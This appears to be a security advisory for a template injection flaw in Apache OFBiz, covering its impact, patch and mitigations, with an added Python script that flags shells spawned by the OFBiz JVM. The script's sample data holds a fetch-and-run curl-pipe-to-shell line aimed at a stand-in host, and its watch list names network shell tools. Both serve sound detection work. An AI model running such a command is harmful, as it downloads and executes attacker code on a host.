CVE-2026-50223

Apache · OFBiz

Apache OFBiz contains a template injection vulnerability that allows authenticated users with specific privileges to execute arbitrary code.

Executive summary

A high-severity template injection vulnerability in Apache OFBiz allows a low-privileged authenticated user (one holding Content/DataResource editing privileges, but no administrative rights) to achieve Remote Code Execution on the server.

Vulnerability

This is an improper control of code generation (code injection) weakness. An authenticated user who holds Content/DataResource editing privileges, but no administrative rights, can store template directives in content that the server later evaluates when it renders that content. Because the template engine runs inside the OFBiz process, with that process's privileges, the injected template can be weaponized to achieve Remote Code Execution (RCE) on the server.

Business impact

Rated CVSS 8.8 (high severity), this vulnerability is serious: successful exploitation grants an attacker the ability to execute arbitrary commands on the server, leading to full system compromise, exfiltration of sensitive data, and potential lateral movement within the corporate network. Exploitation does require an account with Content/DataResource editing rights, so the exposure of a given deployment depends on how widely those rights are granted and how well those accounts are protected.

Remediation

Immediate Action: Upgrade Apache OFBiz to version 24.09.07 or later; this is the release that patches the template injection vulnerability.

Proactive Monitoring: Monitor for child processes (shells, curl/wget, script interpreters) spawned by the OFBiz Java process, which should normally spawn none, and audit creation and modification of Content/DataResource records, paying particular attention to edits made by accounts that have no business reason to touch templates.
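The process-tree check above, as an added example that is not part of this advisory or of the OFBiz project: it parses a `ps -eo pid,ppid,comm,args` snapshot, locates the OFBiz JVM, and reports any descendant process whose command is a shell or a common post-exploitation tool. Assumptions: a Linux host, OFBiz started with `ofbiz.jar` on the command line (the `OFBIZ_MARKER` substring is an assumption and should be adjusted to the local launch command), and the `SAMPLE_PS` snapshot is constructed for illustration.

```python
"""Flag shells and download tools spawned by the OFBiz JVM.

Added example (not from the advisory). Walks a `ps -eo pid,ppid,comm,args`
snapshot, finds the OFBiz Java process and reports descendants whose
command name is a shell or a typical post-exploitation tool.
Assumptions: Linux, and the OFBiz JVM command line contains OFBIZ_MARKER.
"""
import subprocess
from collections import defaultdict

# Assumed: this substring identifies the OFBiz JVM on the command line.
OFBIZ_MARKER = "ofbiz"

# Command names that should essentially never be children of the OFBiz JVM.
SUSPICIOUS = {
    "sh", "bash", "dash", "zsh", "curl", "wget", "nc", "ncat",
    "python", "python3", "perl", "base64",
}


def parse_ps(text):
    """Parse `ps -eo pid,ppid,comm,args` output into a list of dicts.

    The header line is skipped; `args` keeps the full command line so the
    analyst can see what was executed, not just the binary name.
    """
    procs = []
    for line in text.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3] if len(parts) > 3 else ""
        procs.append({"pid": pid, "ppid": ppid, "comm": comm, "args": args})
    return procs


def find_suspicious_children(procs, marker=OFBIZ_MARKER):
    """Return (jvm_pid, pid, comm, args) for every suspicious descendant
    of each Java process whose command line contains `marker`."""
    children = defaultdict(list)
    for p in procs:
        children[p["ppid"]].append(p)

    roots = [p for p in procs
             if p["comm"] == "java" and marker in p["args"].lower()]

    findings = []
    for root in roots:
        # Depth-first walk of the JVM's subtree: a reverse shell is often
        # `sh -c "..."` with curl/wget/sh grandchildren under it.
        stack = list(children[root["pid"]])
        while stack:
            p = stack.pop()
            if p["comm"] in SUSPICIOUS:
                findings.append((root["pid"], p["pid"], p["comm"], p["args"]))
            stack.extend(children[p["pid"]])
    return findings


def snapshot_live():
    """Take a live snapshot on this host and analyse it (Linux only)."""
    out = subprocess.run(
        ["ps", "-eo", "pid,ppid,comm,args"],
        capture_output=True, text=True, check=True,
    ).stdout
    return find_suspicious_children(parse_ps(out))


# Constructed sample snapshot: an OFBiz JVM with a shell, a curl download
# and a second shell underneath it, plus an unrelated interactive bash
# under sshd that must NOT be flagged.
SAMPLE_PS = """\
    PID    PPID COMMAND         COMMAND
      1       0 systemd         /sbin/init
   4210       1 java            /usr/bin/java -jar build/libs/ofbiz.jar
   4388    4210 sh              sh -c "curl http://192.0.2.10/x.sh | sh"
   4390    4388 curl            curl http://192.0.2.10/x.sh
   4391    4388 sh              sh
   4500       1 sshd            /usr/sbin/sshd -D
   4510    4500 bash            -bash
"""

if __name__ == "__main__":
    for jvm, pid, comm, args in find_suspicious_children(parse_ps(SAMPLE_PS)):
        print(f"ALERT jvm={jvm} pid={pid} comm={comm} args={args!r}")
```

Run it periodically (cron, or a systemd timer) and forward the `ALERT` lines to the SIEM. If a deployment legitimately invokes external helpers from the JVM, remove those names from `SUSPICIOUS` rather than muting the check, so that a shell spawned by the application process still stands out.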

Compensating Controls: Deploy a Web Application Firewall (WAF) with rules designed to detect and block template injection payloads targeting Apache OFBiz. Treat this as a stopgap only: the payload is submitted by an authenticated user through the application's own content-editing functions, so until the upgrade is applied the more reliable control is to restrict Content/DataResource editing privileges to the smallest set of trusted accounts and to review existing content records for unexpected template directives.

Exploitation status

Public Exploit Available: false

Analyst recommendation

The ability of an authenticated user with only content-editing privileges to achieve full code execution makes this a critical priority. Organizations running Apache OFBiz should verify their version, apply the 24.09.07 update without delay, and review which accounts hold Content/DataResource editing rights to prevent unauthorized system takeover.